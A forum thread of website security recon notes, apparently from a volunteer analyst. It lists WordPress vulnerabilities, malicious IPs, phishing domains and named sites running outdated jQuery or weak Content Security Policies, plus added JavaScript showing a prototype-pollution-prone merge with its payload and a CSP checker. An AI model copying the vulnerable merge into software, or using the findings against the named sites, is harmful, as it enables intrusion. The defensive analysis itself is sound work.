6.5
WPVDB-ID:9100
WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
6.5
WPVDB-ID:9222
WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
6.5
WPVDB-ID:8766
WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
5.8
WPVDB-ID:9054
WordPress 3.7-4.9.4 - Use Safe Redirect for Login
5.8
WPVDB-ID:9053
WordPress 3.7-4.9.4 - Remove localhost Default
5.8
WPVDB-ID:9169
WordPress <= 5.0 - Authenticated File Delete
5.5
WPVDB-ID:8767
WordPress 4.7.0-4.7.2 - Authenticated Unintended File Deletion in Plugin Delete
5.5
WPVDB-ID:8734
WordPress 4.7.0-4.7.1 - Unauthenticated Page/Post Content Modification via REST API
5
WPVDB-ID:9909
WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
5
WPVDB-ID:9911
WordPress <= 5.2.3 - JSON Request Cache Poisoning
5
WPVDB-ID:8911
WordPress 3.0-4.8.1 - Path Traversal in Unzipping
5
WPVDB-ID:8815
WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
5
WPVDB-ID:9973
WordPress <= 5.3 - Improper Access Controls in REST API
5
WPVDB-ID:8729
WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
5
WPVDB-ID:8721
WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
5
WPVDB-ID:8912
WordPress 4.4-4.8.1 - Path Traversal in Customizer
5
WPVDB-ID:8816
WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
5
WPVDB-ID:8817
WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
5
WPVDB-ID:8719
WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
5
WPVDB-ID:9174
WordPress <= 5.0 - User Activation Screen Search Engine Indexing
5
WPVDB-ID:8910
WordPress 2.9.2-4.8.1 - Open Redirect
4.9
WPVDB-ID:9006
WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
4.3
WPVDB-ID:9975
WordPress <= 5.3 - Stored XSS via Crafted Links
4.3
WPVDB-ID:8820
WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
4.3
WPVDB-ID:8819
WordPress 3.3-4.7.4 - Large File Upload Error XSS
4.3
WPVDB-ID:9910
WordPress <= 5.2.3 - Stored XSS in Style Tags
4.3
WPVDB-ID:8716
WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
4.3
WPVDB-ID:9867
WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
4.3
WPVDB-ID:8913
WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
4.3
WPVDB-ID:8718
WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
4.3
WPVDB-ID:9173
WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
4.3
WPVDB-ID:9055
WordPress 3.7-4.9.4 - Escape Version in Generator Tag
4.3
WPVDB-ID:8769
WordPress 4.7-4.7.2 - Cross-Site Scripting (XSS) via Taxonomy Term Names
4.3
WPVDB-ID:8731
WordPress 4.3.0-4.7.1 - Cross-Site Scripting (XSS) in posts list table
4.3
WPVDB-ID:8914
WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
4.3
WPVDB-ID:8770
WordPress 4.2-4.7.2 - Press This CSRF DoS
4.3
WPVDB-ID:9170
WordPress <= 5.0 - Authenticated Post Type Bypass
4
WPVDB-ID:8967
WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
3.5
WPVDB-ID:9908
WordPress <= 5.2.3 - Stored XSS in Customizer
3.5
WPVDB-ID:9175
WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
3.5
WPVDB-ID:9976
WordPress <= 5.3 - Stored XSS via Block Editor Content
3.5
WPVDB-ID:8968
WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
3.5
WPVDB-ID:8768
WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
3.5
WPVDB-ID:8966
WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
3.5
WPVDB-ID:9172
WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
3.5
WPVDB-ID:8765
WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
3.5
WPVDB-ID:8714
WordPress 4.3-4.7 - Remote Code Execution (RCE) in PHPMailer
0
WPVDB-ID:8906
WordPress 2.3.0-4.7.4 - Authenticated SQL injection
0
2017 Vulners.com

Reputation Check
PASSED
Google Safe Browse:OK
Spamhaus Check:OK
Abuse CC:OK
Dshield Blocklist:OK
Cisco Talos Blacklist: OK

Externally Linked Host   Hosting Provider   Country   
    -www.ahmand.ir          
    -koliee.ir   Hetzner Online GmbH   Germany    
    -www.jnin.ir   Hetzner Online GmbH   Germany    
    -www.kartam.ir          
    -www.kifam.ir          
    -www.ahmand-group.ir          
    -www.zamenn.ir   Hetzner Online GmbH   Germany    
    -www.imbti.ir   Hetzner Online GmbH   Germany    
    -www.vamam.ir   Hetzner Online GmbH   Germany    
    -www.gancher.ir      

polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on May 02, 2020, 06:34:07 PM
Repositories: http://www.cybercrime-tracker.net/
https://atm.cybercrime-tracker.net/index.php?x=yara
https://darkode.cybercrime-tracker.net/
Many more to be mentioned in here: https://github.com/TheHive-Project/CortexDocs/blob/master/analyzer_requirements.md
and various others mentioned there, like https://hunter.io/domain-search

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 03, 2020, 05:17:08 PM
Now some info on combining resources to look at a specific redirect to detect a jQuery library vulnerability,
in this case on an Amazon Trust service propelled website with an event listener script flaw in leanModal.js.

Where did we stumble upon this particular redirect?
Well, here: https://urlscan.io/result/3bf58654-6a1e-4d83-9b11-aec6bbcf9d52/

Then we visited this: https://www.shodan.io/host/13.224.197.67

At Amazon Trust Services we met retirable jQuery libraries:
Quote
Retire.js
jquery   2.1.4.min   Found in -https://www.amazontrust.com/jquery-2.1.4.min.js
Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   
Low   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   123
Medium   Regex in its jQuery.htmlPrefilter sometimes may introduce XSS

Saw inline script: -https://www.amazontrust.com/jquery-2.1.4.min.js

Event listener issue documentation for
https://askcodez.com/leanmodal-js-la-plus-simple-jquery-modal-script-depannage.html

(* code line 583 etc.) in sjcl-0.8.js
Code:
// bind leanModal to every anchor whose rel attribute contains "leanModal"
// (the leading "$" was lost when the snippet was copied)
$("a[rel*=leanModal]").leanModal({
    closeButton: ".modal_close"
});
  to have again completed this going around  ;) ;D

polonus
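The Retire.js finding quoted above for jQuery 2.1.4 includes CVE-2019-11358, the Object.prototype pollution in jQuery.extend(true, {}, ...). The block below is an added example, not code from the post or from jQuery: a deep-extend written the way that class of bug works, beside a hardened variant, run on a constructed JSON body standing in for untrusted input.

```javascript
// Added example, not code from the forum post or from jQuery: a deep-extend
// written the way the CVE-2019-11358 class of bugs works, next to a hardened
// variant. Input is a constructed JSON body standing in for untrusted data.

// Vulnerable: walks into every key of the source, including an own property
// literally named "__proto__". Reading target["__proto__"] yields
// Object.prototype, so the recursion writes onto it and every plain object in
// the process inherits the attacker's value.
function naiveDeepExtend(target, source) {
  for (const key in source) {
    const value = source[key];
    if (value && typeof value === 'object' && !Array.isArray(value)) {
      if (!target[key] || typeof target[key] !== 'object') target[key] = {};
      naiveDeepExtend(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened: skip the keys that reach the prototype chain, only merge into own
// properties of the target, and ignore inherited keys of the source.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeDeepExtend(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (value && typeof value === 'object' && !Array.isArray(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || !target[key] || typeof target[key] !== 'object') target[key] = {};
      safeDeepExtend(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Runs one merge of the constructed payload and reports whether an unrelated
// object now carries the injected property. Cleans Object.prototype afterwards
// so the check can be repeated with the other implementation.
function demonstrate(extend) {
  // JSON.parse creates an own property named "__proto__" (it does not invoke the setter)
  const payload = JSON.parse('{"__proto__": {"polluted": "yes"}, "name": "demo"}');
  const config = extend({ name: 'default' }, payload);
  const leaked = ({}).polluted;
  delete Object.prototype.polluted;
  return { name: config.name, leaked };
}

console.log(demonstrate(naiveDeepExtend)); // { name: 'demo', leaked: 'yes' }
console.log(demonstrate(safeDeepExtend));  // { name: 'demo', leaked: undefined }
```

The hardened version is what a patched merge does in spirit: the dangerous keys are refused outright, and the target is only descended into through its own properties, so an inherited object can never become the write target.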
Title: Re: Tests and other Media topics
Post by: polonus on May 07, 2020, 10:03:02 PM
Checking on Content Security Policy, checked with CSP evaluator:
checked at -https://www.stetson.edu/software/greenpages/index.php
obj-src -> https: URI in object-src allows the execution of unsafe scripts.
Can you restrict object-src to 'none' only?
Script-src -> 'unsafe-inline'
'unsafe-inline' allows the execution of unsafe in-page scripts and event handlers.
'unsafe-eval'
'unsafe-eval' allows the execution of code injected into DOM APIs such as eval().
https:
https: URI in script-src allows the execution of unsafe scripts.

Quick Source
Quote
HTML
-www.stetson.edu/software/greenpages/index.php
7,820 bytes, 96 nodes

Javascript 6   (external 4, inline 2)
-www.googletagmanager.com/gtm.js?id=GTM-MTV2B2
INLINE: (function() { let alreadyInsertedMetaTag = false function __insertDappDete
1,238 bytes

INLINE: (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date
370 bytes

-ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js
-ajax.googleapis.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.js
-www.stetson.edu/software/greenpages/assets/js/template.js

CSS 4   (external 2, inline 2)
-ajax.googleapis.com/ajax/libs/jqueryui/1.12.1/themes/smoothness/jquery-ui.css
INJECTED

-www.stetson.edu/software/greenpages/assets/css/style.css
INJECTED

INLINE: @media print {#ghostery-purple-box {display:none !important}}
61 bytes INJECTED

INLINE: :root #content > #center > .dose > .dosesingle, :root #content > #right > .dose
120 bytes INJECTED

On the other hand, where websites seem rather secure like: -https://www.collegebeaufeuillagesaintbrieuc.ac-rennes.fr/
the hosting party for the particular IP it is on can come with many vulnerabilities: https://www.shodan.io/host/195.221.67.111

So we need two to tango securely: the website on the client side and where it is being hosted on a webserver.
 
polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
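The four CSP Evaluator complaints quoted above (https: in object-src, 'unsafe-inline', 'unsafe-eval', and https: in script-src) are all detectable from the policy string alone. The block below is an added example, not code from the post or from Google's CSP Evaluator: a small checker that raises those findings, run on a constructed policy that reproduces them and on a tightened one (the nonce value is a placeholder).

```javascript
// Added example, not code from the forum post or from Google's CSP Evaluator:
// a checker for the findings quoted above. Both policies are constructed.

function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // browsers honour the first occurrence of a directive and ignore repeats
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

// script-src and object-src fall back to default-src when they are absent
function effectiveSources(directives, name) {
  if (directives.has(name)) return directives.get(name);
  if (directives.has('default-src')) return directives.get('default-src');
  return null;
}

// A scheme-only source or a bare wildcard lets any origin using that scheme serve code
function isSchemeWideOrWildcard(src) {
  return src === '*' || /^(https?|data|blob|filesystem|ws|wss):$/i.test(src);
}

function evaluateCsp(policy) {
  const d = parseCsp(policy);
  const findings = [];
  const script = effectiveSources(d, 'script-src');
  const object = effectiveSources(d, 'object-src');

  if (script === null) {
    findings.push({ severity: 'high', directive: 'script-src', message: 'no script-src and no default-src: scripts from anywhere may run' });
  } else {
    const hasNonceOrHash = script.some(s => /^'(nonce-|sha(256|384|512)-)/.test(s));
    if (script.includes("'unsafe-inline'")) {
      findings.push({
        // CSP3 browsers ignore 'unsafe-inline' once a nonce or hash is present; it then only serves older browsers
        severity: hasNonceOrHash ? 'medium' : 'high',
        directive: 'script-src',
        message: "'unsafe-inline' allows the execution of unsafe in-page scripts and event handlers",
      });
    }
    if (script.includes("'unsafe-eval'")) {
      findings.push({ severity: 'medium', directive: 'script-src', message: "'unsafe-eval' allows code injected into DOM APIs such as eval()" });
    }
    for (const src of script.filter(isSchemeWideOrWildcard)) {
      findings.push({ severity: 'high', directive: 'script-src', message: `${src} allows the execution of unsafe scripts from any origin using that scheme` });
    }
  }

  if (object === null || !(object.length === 1 && object[0] === "'none'")) {
    findings.push({ severity: 'high', directive: 'object-src', message: "object-src should be 'none': plugins can be used to execute script" });
  }
  if (!d.has('base-uri')) {
    findings.push({ severity: 'medium', directive: 'base-uri', message: 'missing base-uri allows injected <base> tags to redirect relative script URLs' });
  }
  return findings;
}

// Constructed policy that reproduces the evaluator's complaints for the page above
const WEAK_POLICY = "default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https:; object-src https:";
// Constructed tightened policy: nonce-based script loading, no plugins, base-uri pinned
const HARDENED_POLICY = "default-src 'self'; script-src 'nonce-PLACEHOLDER' 'strict-dynamic' 'self'; object-src 'none'; base-uri 'self'";

for (const f of evaluateCsp(WEAK_POLICY)) console.log(`${f.severity}\t${f.directive}\t${f.message}`);
console.log('hardened findings:', evaluateCsp(HARDENED_POLICY).length); // hardened findings: 0
```

The checker applies the same fallback a browser does: when script-src or object-src is missing, default-src is what actually governs that resource type, so a policy that only sets default-src 'unsafe-inline' is still flagged.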
Title: Re: Tests and other Media topics
Post by: polonus on May 08, 2020, 01:19:49 AM
Another comparison of scan results of this Hall of Shame website (F-Grade results):
https://www.immuniweb.com/websec/?id=K0O4GbwC
&
https://sitecheck.sucuri.net/results/usosweb.usos.pw.edu.pl
&
https://www.shodan.io/host/194.29.138.69

Retirable jQuery libraries: Retire.js
jquery-migrate   1.1.0.min   Found in -https://usosweb.usos.pw.edu.pl/js/jquery-migrate-1.1.0.min.js
Vulnerability info:
Medium   jQuery Migrate 1.2.0 Released cross-site-scripting
Medium   11290 Selector interpreted as HTML
jquery-ui-dialog   1.10.1   Found in -https://usosweb.usos.pw.edu.pl/js/jquery-ui-1.10.1.custom.min.js
Vulnerability info:
High   CVE-2016-7103 281 XSS Vulnerability on closeText option
jquery   1.9.1.min   Found in -https://usosweb.usos.pw.edu.pl/js/jquery-1.9.1.min.js
Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-925
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers
Low   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution
Medium   Regex in its jQuery.htmlPrefilter sometimes may introduce XSS
jquery   1.9.1   Found in -https://usosweb.usos.pw.edu.pl/js/jquery-usos/latest-bundle.min.js?v=4
Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   
Low   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   123
Medium   Regex in its jQuery.htmlPrefilter sometimes may introduce XSS

See: https://observatory.mozilla.org/analyze/usosweb.usos.pw.edu.pl

SSL Server test: A grade: https://www.ssllabs.com/ssltest/analyze.html?&hideResults=on&d=usosweb.usos.pw.edu.pl

For kontroller.php -> https://github.com/ademkarakus/MYTicketSys/blob/master/kontroller.php
Security Overview: https://github.com/ademkarakus/MYTicketSys/security

polonus

Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2020, 11:22:53 PM
Abuse IP related resources:
https://www.abuseipdb.com/check/79.137.2.105
&
https://www.shodan.io/host/79.137.2.105
&
https://viz.greynoise.io/ip/79.137.2.105
&
https://bl.isx.fr/79.137.2.105
&
https://www.virustotal.com/gui/url/51ba250152a02b5b34937b6debfa340985958021b78566c396de7234a0ba9f0b/detection  (Spamhaus to detect)
4 engines to detect: https://www.virustotal.com/gui/ip-address/79.137.2.105/detection
(none) https://www.virustotal.com/gui/ip-address/79.137.2.105/relations
as well as here: https://secure.dshield.org/ipinfo.html?ip=71.137.2.105&update=yes

Flagged as attack source: https://db-ip.com/79.137.2.105
Not secure -> hxtps://ip105.ip-79-137-2.eu/

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 11, 2020, 12:34:48 PM
Check your device against the Thunderbolt-hole with Thunderspy
Thunderbolt can grant attackers with physical access entry onto locked computers

Read (with downloads) -> https://thunderspy.io/#TODO-FIX-ME

credits due go to Björn Ruytenberg

polonus

Title: Re: Tests and other Media topics
Post by: polonus on May 14, 2020, 07:07:07 PM
Various checks on a potentially malicious IP:

https://urlscan.io/ip/108.170.29.140

https://www.abuseipdb.com/check/108.170.29.140

https://cyberwarzone.com/malicious-history-of-108-170-29-140/

https://securitytrails.com/list/ip/108.170.29.140

https://www.virustotal.com/gui/ip-address/108.170.29.140/relations

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 15, 2020, 12:14:36 PM
Now apply this onto some IP addresses found in this report:
https://www.wordfence.com/blog/2020/05/one-attacker-rules-them-all/

As with most attack campaigns, the attacker frequently rotates IP addresses. At the moment, we are seeing attacks from these top 10 attacking IP addresses.

5.187.34.95 -> https://www.shodan.io/host/5.187.34.95
91.121.106.106 -> https://www.shodan.io/host/91.121.106.106  (see all the vulners there)
94.23.3.130 -> https://www.shodan.io/host/94.23.3.130 (see all the vulners there)
54.36.197.5 -> https://www.shodan.io/host/54.36.197.5 (see all the vulners there)
46.37.172.252 -> https://www.shodan.io/host/46.37.172.252 (with a great many vulnerabilities)
104.238.222.178 -> https://www.abuseipdb.com/check/104.238.140.243
2001:41d0:2:482:: -> https://www.abuseipdb.com/check/2001:41d0:2:482::
104.236.133.77 -> https://www.abuseipdb.com/check/104.236.133.77
2001:41d0:c:c3d:: -> https://www.abuseipdb.com/check/151.80.25.182
151.80.25.182

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 15, 2020, 02:50:25 PM
But there is more - domainnames found as connected with malcode:
https://www.virustotal.com/gui/url/629ada9a00e95b0408597f3fcfaf3c7d59355642372aee6e21bc1fa085bfa8e8/details
and IP relations (with 5 detections): https://www.virustotal.com/gui/ip-address/162.241.65.79/relations
net.net powered by vesta Coming Soon (must mean malware coming soon  ;) ).
Quote
<title>net.net — Coming Soon</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="description" content="This is a default index page for a new domain.">
    <style type="text/css">
See: https://www.shodan.io/host/162.241.65.79  Unified Layer abuse (various vulnerabilities listed).
Quote
22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp  open  http    nginx
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: nginx
|_http-title: net.net &mdash; Coming Soon
443/tcp open  ssl
|_http-server-header: nginx
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|_  http/1.1

IP found in this list: https://gist.github.com/techhelplist/a24726050000a0432032d3cb840feb16
meaning
Quote
188winerium.com   #phishing GBA 162.241.65.79, 2020-03-27
dahlgrenhouse.com   #phishing GBA 162.241.65.79, 2020-03-27
debramarchese.com   #phishing GBA 162.241.65.79, 2020-03-27
giovannirosania.com   #phishing GBA 162.241.65.79, 2020-03-27
h2hcareplus.com   #phishing GBA 162.241.65.79, 2020-03-27
hmefrontoffice.org   #phishing GBA 162.241.65.79, 2020-03-27
northportdentures.com   #phishing GBA 162.241.65.79, 2020-03-27
northportsmiles.com   #phishing GBA 162.241.65.79, 2020-03-27
odontobaranda.com   #phishing GBA 162.241.65.79, 2020-03-27
portcharlottebottox.com   #phishing GBA 162.241.65.79, 2020-03-27
southwestgeorgiaurology.com   #phishing GBA 162.241.65.79, 2020-03-27
swguro.com   #phishing GBA 162.241.65.79, 2020-03-27
wilkumhome.com   #phishing GBA 162.241.65.79, 2020-03-27
wilmerdental.com   #phishing GBA 162.241.65.79, 2020-03-27
wilmerfranco.com   #phishing GBA 162.241.65.79, 2020-03-27
info credits go to Jay THL.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 18, 2020, 01:56:49 PM
Normally when we are going to this address - MediaWiki code is not shown.
Whenever we scan for DOM XSS sinks and sources we stumble at:
Results from scanning URL: https://84.96.107.210/
Number of sources found: 6
Number of sinks found: 1
See attached code as txt
At shodan.io we see: https://www.shodan.io/host/84.96.107.210  plus various vulnerabilities mentioned.

But we can via 210.107.96.84.rev.sfr.net
and then we will land at Wiki PEPS: http://84.96.107.210/mediawiki/index.php/Accueil

and then we stumble upon retirable code like
Code:
mustache.js 0.8.2 Found in
-http://84.96.107.210/mediawiki/load.php?debug=false&lang=fr&modules=ext.collapsiblevector.collapsibleNav%7Cext.embedVideo%2Cpopups%7Cext.flaggedRevs.advanced%7Cext.popups.images%7Cjquery.accessKeyLabel%2CbyteLength%2CcheckboxShiftClick%2Cclient%2Ccookie%2CgetAttrs%2Chidpi%2ChighlightText%2Cmw-jump%2Csuggestions%2CtabIndex%2Cthrottle-debounce%7Cmediawiki.RegExp%2CTitle%2CUri%2Capi%2Ccldr%2Cexperiments%2CjqueryMsg%2Clanguage%2Cnotify%2CsearchSuggest%2Cstorage%2Ctemplate%2Cuser%2Cutil%7Cmediawiki.api.user%7Cmediawiki.language.data%2Cinit%7Cmediawiki.libs.pluralruleparser%7Cmediawiki.page.ready%2Cstartup%7Cmediawiki.template.mustache%2Cregexp%7Cmediawiki.ui.button%2Cicon%7Cmmv.bootstrap%2Chead%7Cmmv.bootstrap.autostart%7Coojs%2Csite%7Cskins.vector.js%7Cuser.defaults&skin=vector&version=1sm2d3j
Vulnerability info:
Medium pull request 530 weakness in HTML escaping
Number of XSS-DOM-sources found: 98
Number of XSS-DOM-sinks found: 59

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 28, 2020, 06:50:32 PM
What sites pay Adblock to be whitelisted?
Example here: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=bXVsbHt9bXsjW3wuXX1n~enc
Re on IP: https://www.shodan.io/host/209.99.64.71

Interesting survey: https://jacobsalmela.com/2015/03/16/find-out-what-sites-paid-to-be-whitelisted-from-adblock-plus/

Or the way polonus did it: https://www.shodan.io/search?query=X-Adblock-Key%3A
and an example of a result found that way: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=MTk5LjU5LjI0Mi4xNTBg~enc

Consider: https://sitereport.netcraft.com/?url=http://199.59.242.150
Two engines to detect: https://www.virustotal.com/gui/ip-address/199.59.242.150/detection
IP relations: https://www.virustotal.com/gui/ip-address/199.59.242.150/relations

QED,

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 06, 2020, 12:30:13 PM
Check a website for reputation: https://talosintelligence.com/reputation_center/lookup?search=www.leader-price.pl
See: https://urlscan.io/result/c617e91f-000f-4e94-8081-fd470da4d52d/
And here: https://www.islegitsite.com/ Potentially legit.
Listed here: http://multirbl.valli.org/lookup/www.leader-price.pl.html
Quote
801   www.leader-price dot pl   fmb.la sa   sa.fmb.la   Not listed
7   -www.leader-price.pl   Hostkarma   -hostkarma.junkemailfilter.com   Listed
    Query:   
-www.leader-price.pl.hostkarma.junkemailfilter.com
    A Record:   
127.0.2.3
    TTL:   
43200
    DB_rc:   
Familiar domain (older than 10 days)
On AS: https://urlscan.io/asn/AS16276

Combine with the results of a scan here: https://webcookies.org

Also compare: https://badpackets.net/botnet-c2-detections/  and results here: https://ipinfo.io/AS208666
-> -https://t.co/ZusFyn1YfH abuse from IP:  https://www.abuseipdb.com/check/37.49.226.220
and https://blackip.ustc.edu.cn/sshrawlist.php?ip=37.49.226.220 (info courtesy of China Education and Research Network Center, credits go there);

Re: https://www.iptolocation.net/trace-51.68.189.111  and at blackip, we see: zookeeper, www, weblogic, webadmin, user, uploader, ubuntu, test, svn, support, student, spark, postgres, oracle, odoo, marketing, jenkins, gituser, git, ftpadmin, ec2-user, demo, debian, db2inst1, centos, ansible, admin. See: https://sitereport.netcraft.com/?url=vps-f6793ddb.vps.ovh.net

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 08, 2020, 11:25:35 AM
Is a website safe to visit? This one, -damco.xyz, is certainly not.

Checked at trustscam's: -damco.xyz here: https://trustscam.nl/damco.xyz
Redirecting -> https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=I3xtXl0ueHl6~enc
Consider second redirect: https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=Z3ZrfHoufCN1bHR0I3x0e3MuXl1tYF5gI3w1NyNeNTU1ezUwNTcyIzxzMT0xODk2NCZzMj03MzQwNCZqNj0x~enc
And  a third one : https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=d3d3LjE4cGx1c3N0fXt8bS5ue3RgXmA0Xjh8NjY5YjgzezZeMiMzPCZebFtea19bIz1bXnV9aDV7I3swezQyNSMxZjg4NzUyMTI3MTYmczE9MTg5NjQmczI9NzM0MDQmczM9Ynxea3Vze30mczU9JmxwPU1KJmoxPSZqMj0majM9Jmo0PSZqNT0majY9MQ%3D%3D~enc

Location: -https://gvkaz.adulttdates.com/c/da57dcXXXXX0572d?s1=18XXX&s2=7XXX4&j6=1
Note: This line has redirected the request to -https://gvkaz.adulttdates.com/c/da57dXXXXX50572d?s1=1XXX4&s2=7XX04&j6=1
Even server address -ip-184-168-131-241.ip.secureserver.net at GoDaddy's is re-directing via an URL Shortener:
-https://shortener.secureserver.net/error_404 -> TypeError: Cannot read property 'set' of undefined
 /error_404:163   ERROR: The request could not be satisfied CloudFront reply..

ReferenceError: ReactDOM is not defined
 /error_404:203

Quote
<html>
<head>
<noscript>
<meta http-equiv="refresh" content="0; url=/?group_id=3560&keyword=1XX64&subid=xgsxl5ede01eddaXXXXX992268&hasJs=false&jsChecked=true" />
</noscript>
<script type="text/javascript">
window.location.href = '/?group_id=3XX0&keyword=18964&subid=xgsxl5ede01eddXXXXXXXXXX268&jsChecked=true';
</script>
</head>
<body></body>
</html>
DOM-XSS source & sink

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on June 13, 2020, 12:31:57 PM
Zero-day exploit
Read: https://www.vice.com/en_us/article/v7gd9b/facebook-helped-fbi-hack-child-predator-buster-hernandez


Unpatched IP discovery, this is an "oldy but goldy" in the realm of tor-exploits  (info credits go to Dominik Bok)

Re: http://xordern.net/ip-leakage-of-mobile-tor-browsers.html

Especially be careful using the Brave browser's private window with Tor (always update and fully patch the Tor browser).
Disable Autoplay: all kinds of external multimedia elements can be loaded through internal multimedia players.
In this way the internal user IP address can be discovered easily, even after 1 or 2 requests for the running "raw http stream" content.

Check using the Quick Source View extension in the browser to find out what normally is being loaded externally.
To use Tor a tad more safely in a legit fashion this is very important.

This could also happen when no WebChromeClient for inline HTML5 video on Android has been set.

Perfect all-round security will always be and stay an illusion,
and in the aforementioned case the facebook zero-day exploit helped to nail the child-abuser.
So as often repeated the credo is: "Don't do the crime, if you can't pay the time!".

But on the other hand it could also mean danger for legit users and journalists working amidst dictatorships,
and for them such a Facebook zero-day would just mean bad luck and could potentially endanger their lives.

"When the going gets narrow, always keep your eye on the Tor-sparrow".
So it often is a cat-and-mouse game. And in the aforementioned case the authorities did win.
 (info credits go to xordern and luntrus)

Quote
<video controls="controls" autoplay="autoplay" poster="<=php file>">
                  
<source src="<=php file>" type="video/mp4" />
                  
</video>

Check for eventual IP leakage with HTML5 here: http://xordern.net/checkip
For me Fire Onion on android seems secure.

Enjoy, my good friends, enjoy,

polonus

P.S. Also be aware not to land at a blacklisted exit node, example: https://cleantalk.org/blacklists/185.220.101.143
which there is being blacklisted by three instances.

D.
Title: Re: Tests and other Media topics
Post by: polonus on June 14, 2020, 05:17:27 PM
Interactions of Programming Languages being made visible:

https://exploring-data.com/vis/programming-languages-influence-network/#JavaScript

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 15, 2020, 09:17:49 PM
Weak PHP - PHP insecurity on websites (webserver).
While testing a particular website with Nibbler, I stumbled upon these:
-http://dorinfo.ru/
-http://dorinfo.ru/fines.php
-http://dowinfo.ru/PDD/php
-http://dorinfo.ru/contacts.php
-http://dorindo.ru/register.php

But there is more as we can establish from this public scan: code lines 123 - 128 ->
https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=I119W25mXS59dQ%3D%3D~enc

E.g: /news/addnews.php  -> XSS-DOM
Number of sources found: 4
Number of sinks found: 499

None: Results from scanning URL:
htXp://dorinfo.ru/bitrix/cache/js/s1/detailed/template_53dfdefb96a04a200ee821253e355c32/template_53dfdefb96a04a200ee821253e355c32_v1.js?1583321714934
Number of sources found: 0
Number of sinks found: 0

